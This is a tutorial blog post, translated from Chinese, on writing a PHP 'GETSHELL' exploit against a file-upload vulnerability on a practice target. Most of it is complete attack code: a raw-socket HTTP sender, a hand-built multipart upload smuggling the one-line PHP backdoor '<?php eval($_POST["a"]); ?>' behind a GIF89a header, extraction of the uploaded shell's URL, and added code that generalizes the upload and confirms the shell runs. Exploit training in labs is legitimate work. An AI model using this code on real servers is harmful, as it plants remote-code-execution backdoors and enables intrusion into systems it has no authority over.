Web Security Chapter 7: Writing Exploits, Part 3


Sep 27 2018



Web Security Chapter 7: Writing Exploits, Part 3: Writing a GETSHELL Exploit


In the previous part I walked through writing an exploit for a POST injection. This part is also about POST submissions: many readers want a GETSHELL, so how do you write a GETSHELL script?

GETSHELL means obtaining access directly, either by executing commands straight away or by uploading a web shell (getwebshell).

Open the 暗月 (mOon) practice target system and go to the upload vulnerability test.


[Figure 13.png]

[Figure 14.png]


Testing the upload page shows that an image-disguised web shell can be uploaded directly. Capture the request with Burp Suite:


POST /upload.php HTTP/1.1
Host: target_sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://target_sys.com/upload.php
Content-Type: multipart/form-data; boundary=---------------------------86531354118821
Content-Length: 23124
Cookie: PHPSESSID=8fj89vrpvaavg5sc92ifg5gu75
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------86531354118821
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg

GIF89ad




The GETSHELL is written in PHP and talks to the server over a raw socket. Note that fsockopen(), which the code below uses, is part of PHP core and needs no extension; only the socket_create() family requires the sockets extension (php_sockets.dll on Windows, sockets.so elsewhere) to be enabled in php.ini.


function http_send($host, $packet){

        $resp = '';   // initialise so the first .= does not raise a notice

        // plain TCP to port 80; for HTTPS use "ssl://{$host}" and port 443
        $sock = @fsockopen($host, 80, $errno, $errstr, 10);
        
        if(!$sock){
                print "\n[-] No response from {$host}:80 ({$errstr}) Trying again...";
                $sock = @fsockopen($host, 80, $errno, $errstr, 10);
                if(!$sock){
                        die("\n[-] Giving up: {$errstr}\n");
                }
        }
        
        // write the raw HTTP request, then read until the server closes the socket
        fputs($sock, $packet);
        
        while (!feof($sock)) {
                $resp .= fread($sock, 1024);
        }
        
        fclose($sock);
        return $resp;

}


The function above sends the raw POST packet and collects the response.


    function data($host,$filename){
       
        // multipart body; the boundary here must match the one in the Content-Type header
        $payload  = "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
        $payload .= "Content-Type: image/jpeg\r\n\r\n";
        // GIF89a signature so a naive image check passes, then the one-line PHP shell
        $payload .= 'GIF89a'."\r\n".'<?php eval($_POST["a"]); ?>'."\r\n";
        $payload .= "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name=\"sub\"";
        $payload .="\r\n\r\n";
        $payload .="12132\r\n";
        $payload .="-----------------------------86531354118821--\r\n";
        // raw HTTP/1.1 request; Content-Length is the byte length of the body
        $packet  = "POST /upload.php HTTP/1.1\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
        $packet .= "Content-Length: ".strlen($payload)."\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $payload;
       
        return $packet;

    }




This builds the POST packet by hand; after stripping the unneeded headers it is the same as the one captured in Burp.


---------------------------86531354118821-- is the closing boundary: the boundary string with "--" appended, which tells the server that the multipart body is finished. Every part in the body starts with "--" followed by the same boundary value given in the Content-Type header.


[Figure 16.png]


$payload .= 'GIF89a'."\r\n".'<?php eval($_POST["a"]); ?>'."\r\n";


This is the content of the image web shell you upload: a GIF89a signature followed by a one-line PHP backdoor that eval()s whatever is sent in the POST parameter a. (The array key is quoted so the shell also runs on PHP 8, where an unquoted constant is an error.)



$filename  = "moon.php";
$host = "target_sys.com";
print http_send($host,data($host,$filename));



$filename is the name the file is uploaded under; $host is the target domain.
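As an added example (my code, not part of the original post), here is a general version of what data() does by hand: a multipart/form-data builder that takes any set of form fields and files, generates a random boundary per request, and computes Content-Length from the exact body bytes, so the packet stays valid if you change the filename, the shell contents, or add fields. It assumes PHP 7+ (for random_bytes()); the host, path and field names are illustrative and taken from the captured request above.

```php
<?php
// Added example: general multipart/form-data request builder.
// Assumptions: PHP 7+, target host/path/field names as in the captured request.

function multipart_body(array $fields, array $files, $boundary) {
    $body = '';
    // ordinary form fields, e.g. the "sub" submit button
    foreach ($fields as $name => $value) {
        $body .= "--{$boundary}\r\n";
        $body .= "Content-Disposition: form-data; name=\"{$name}\"\r\n\r\n";
        $body .= $value . "\r\n";
    }
    // file parts: fieldname => [filename, mime type, raw contents]
    foreach ($files as $name => $f) {
        list($filename, $mime, $content) = $f;
        $body .= "--{$boundary}\r\n";
        $body .= "Content-Disposition: form-data; name=\"{$name}\"; filename=\"{$filename}\"\r\n";
        $body .= "Content-Type: {$mime}\r\n\r\n";
        $body .= $content . "\r\n";
    }
    // closing boundary: the boundary with "--" appended
    $body .= "--{$boundary}--\r\n";
    return $body;
}

function build_post($host, $path, array $fields, array $files) {
    // the boundary must not occur inside any part; random hex makes that negligible
    $boundary = '----------------------------' . bin2hex(random_bytes(8));
    $body = multipart_body($fields, $files, $boundary);
    $packet  = "POST {$path} HTTP/1.1\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "User-Agent: Mozilla/5.0\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary={$boundary}\r\n";
    $packet .= "Content-Length: " . strlen($body) . "\r\n";   // bytes, not characters
    $packet .= "Connection: close\r\n\r\n";
    return $packet . $body;
}

// image shell as in the post: GIF89a magic so a naive image check passes
$shell = "GIF89a\r\n<?php eval(\$_POST[\"a\"]); ?>\r\n";

$packet = build_post('target_sys.com', '/upload.php',
    ['sub' => '12132'],
    ['file' => ['moon.php', 'image/jpeg', $shell]]);

// sanity check before sending: the header boundary and the closing boundary must agree
preg_match('/boundary=(\S+)/', $packet, $m);
if (strpos($packet, "--{$m[1]}--\r\n") === false) {
    die("[-] malformed multipart body\n");
}
echo $packet;
// send it with http_send($host, $packet) from the post
```

The sanity check at the end catches the most common mistake when hand-building multipart bodies: the boundary in the header and the "--boundary--" terminator drifting apart, which makes the server silently ignore the file part.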

Below is the full getshell code. Save it as exp2.php.


<?php

function http_send($host, $packet){

        $resp = '';   // initialise so the first .= does not raise a notice

        // plain TCP to port 80; for HTTPS use "ssl://{$host}" and port 443
        $sock = @fsockopen($host, 80, $errno, $errstr, 10);
        
        if(!$sock){
                print "\n[-] No response from {$host}:80 ({$errstr}) Trying again...";
                $sock = @fsockopen($host, 80, $errno, $errstr, 10);
                if(!$sock){
                        die("\n[-] Giving up: {$errstr}\n");
                }
        }
        
        // write the raw HTTP request, then read until the server closes the socket
        fputs($sock, $packet);
        
        while (!feof($sock)) {
                $resp .= fread($sock, 1024);
        }
        
        fclose($sock);
        return $resp;

}



function data($host,$filename){
        
        // multipart body; the boundary here must match the one in the Content-Type header
        $payload  = "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
        $payload .= "Content-Type: image/jpeg\r\n\r\n";
        // GIF89a signature so a naive image check passes, then the one-line PHP shell
        $payload .= 'GIF89a'."\r\n".'<?php eval($_POST["a"]); ?>'."\r\n";
        $payload .= "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name=\"sub\"";
        $payload .="\r\n\r\n";
        $payload .="12132\r\n";
        $payload .="-----------------------------86531354118821--\r\n";
        // raw HTTP/1.1 request; Content-Length is the byte length of the body
        $packet  = "POST /upload.php HTTP/1.1\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
        $packet .= "Content-Length: ".strlen($payload)."\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $payload;
        
        return $packet;

}

$filename  = "moon.php";

$host = "target_sys.com";
print http_send($host,data($host,$filename));



Run the script, as shown in the figure:

[Figure 17.png]


The response printed in the terminal contains a lot of content we do not need, so the script should extract the web shell's path from it and return only that. The complete exp is as follows:

<?php

function http_send($host, $packet){

        $resp = '';   // initialise so the first .= does not raise a notice

        // plain TCP to port 80; for HTTPS use "ssl://{$host}" and port 443
        $sock = @fsockopen($host, 80, $errno, $errstr, 10);
        
        if(!$sock){
                print "\n[-] No response from {$host}:80 ({$errstr}) Trying again...";
                $sock = @fsockopen($host, 80, $errno, $errstr, 10);
                if(!$sock){
                        die("\n[-] Giving up: {$errstr}\n");
                }
        }
        
        // write the raw HTTP request, then read until the server closes the socket
        fputs($sock, $packet);
        
        while (!feof($sock)) {
                $resp .= fread($sock, 1024);
        }
        
        fclose($sock);
        return $resp;

}



function data($host,$filename){
        
        // multipart body; the boundary here must match the one in the Content-Type header
        $payload  = "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
        $payload .= "Content-Type: image/jpeg\r\n\r\n";
        // GIF89a signature so a naive image check passes, then the one-line PHP shell
        $payload .= 'GIF89a'."\r\n".'<?php eval($_POST["a"]); ?>'."\r\n";
        $payload .= "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name=\"sub\"";
        $payload .="\r\n\r\n";
        $payload .="12132\r\n";
        $payload .="-----------------------------86531354118821--\r\n";
        // raw HTTP/1.1 request; Content-Length is the byte length of the body
        $packet  = "POST /upload.php HTTP/1.1\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
        $packet .= "Content-Length: ".strlen($payload)."\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $payload;
        
        return $packet;

}


$filename  = "moon.php";
$host = "target_sys.com";
$html_str = http_send($host,data($host,$filename));

// the upload page echoes the saved path after "Stored in:"; pull just that
// out of the full HTML response (preg_match returns 0 if the marker is absent)
if (preg_match("/Stored in: (.*?)</", $html_str, $m)){
        echo "http://".$host."/".$m[1]."\n";
}else{
        echo "false\n";
}
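Searching the whole raw response with one regex works on the practice target, but it is fragile: the path can be split across chunks, and a 500 or a redirect still gets searched as if it were a success page. As an added example (my code, not the post's), the block below parses the response http_send() returns before looking for the path: it splits status line, headers and body, decodes a chunked body (an HTTP/1.1 server may chunk the response even with "Connection: close"), checks the status code, and only then extracts the "Stored in:" path. It also builds the follow-up request that proves the shell actually executes. The sample response is constructed for the example; the host, upload directory and marker value are assumptions.

```php
<?php
// Added example: parse the raw HTTP response, then extract the shell path.
// Assumptions: the upload page echoes "Stored in: <path>" on success;
// host, upload directory and the sample response below are constructed.

function parse_response($raw) {
    $parts = explode("\r\n\r\n", $raw, 2);
    if (count($parts) < 2) {
        return null;                                    // not a complete HTTP response
    }
    list($head, $body) = $parts;
    $lines  = explode("\r\n", $head);
    $status = (int) substr(array_shift($lines), 9, 3);  // "HTTP/1.1 200 OK" -> 200
    $headers = [];
    foreach ($lines as $line) {
        if (strpos($line, ':') === false) {
            continue;
        }
        list($k, $v) = array_map('trim', explode(':', $line, 2));
        $headers[strtolower($k)] = $v;
    }
    if (isset($headers['transfer-encoding'])
        && stripos($headers['transfer-encoding'], 'chunked') !== false) {
        $body = decode_chunked($body);
    }
    return ['status' => $status, 'headers' => $headers, 'body' => $body];
}

// "<hex size>\r\n<data>\r\n" repeated, terminated by a zero-size chunk
function decode_chunked($data) {
    $out = '';
    $pos = 0;
    while (($eol = strpos($data, "\r\n", $pos)) !== false) {
        $sizeline = substr($data, $pos, $eol - $pos);
        $len = hexdec(trim(explode(';', $sizeline)[0]));  // drop chunk extensions
        if ($len === 0) {
            break;
        }
        $out .= substr($data, $eol + 2, $len);
        $pos  = $eol + 2 + $len + 2;                     // skip data and its trailing CRLF
    }
    return $out;
}

// returns the URL of the uploaded shell, or null if the upload did not succeed
function shell_url($host, $raw) {
    $r = parse_response($raw);
    if ($r === null || $r['status'] !== 200) {
        return null;
    }
    // same marker the post's regex relies on: the upload page echoes the saved path
    if (!preg_match('/Stored in:\s*([^<\s]+)/', $r['body'], $m)) {
        return null;
    }
    return "http://{$host}/" . ltrim($m[1], '/');
}

// builds the follow-up request that proves the shell runs: the shell eval()s the
// POSTed expression, so md5 of a marker will appear in the reply if it works
function verify_packet($host, $path, $marker) {
    $body    = 'a=' . urlencode("echo md5('{$marker}');");
    $packet  = "POST {$path} HTTP/1.1\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Content-Length: " . strlen($body) . "\r\n";
    $packet .= "Connection: close\r\n\r\n";
    return $packet . $body;
}

// constructed sample: a chunked 200 response from the upload page
$chunk1  = "<html><body>File uploaded. Stored in: ";
$chunk2  = "uploads/moon.php</body></html>";
$sample  = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n";
$sample .= "Transfer-Encoding: chunked\r\nConnection: close\r\n\r\n";
$sample .= dechex(strlen($chunk1)) . "\r\n" . $chunk1 . "\r\n";
$sample .= dechex(strlen($chunk2)) . "\r\n" . $chunk2 . "\r\n0\r\n\r\n";

$host = 'target_sys.com';
$url  = shell_url($host, $sample);
if ($url === null) {
    die("[-] upload failed or path not found in response\n");
}
echo "[+] shell at {$url}\n";

// to confirm, send this with http_send() and look for md5('moon') in the reply body
echo verify_packet($host, parse_url($url, PHP_URL_PATH), 'moon');
```

The verification step matters in practice: a file that was stored but is served as a static image (or lands in a directory where PHP execution is disabled) gives the same "Stored in:" line as a working shell, and only the second request tells them apart.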



Download the exp: exp2.rar


Run the script:


[Figure 18.png]


Tags: exp writing

Copyright: unless otherwise noted, this article is original work by mOon; please keep the source link when reposting.
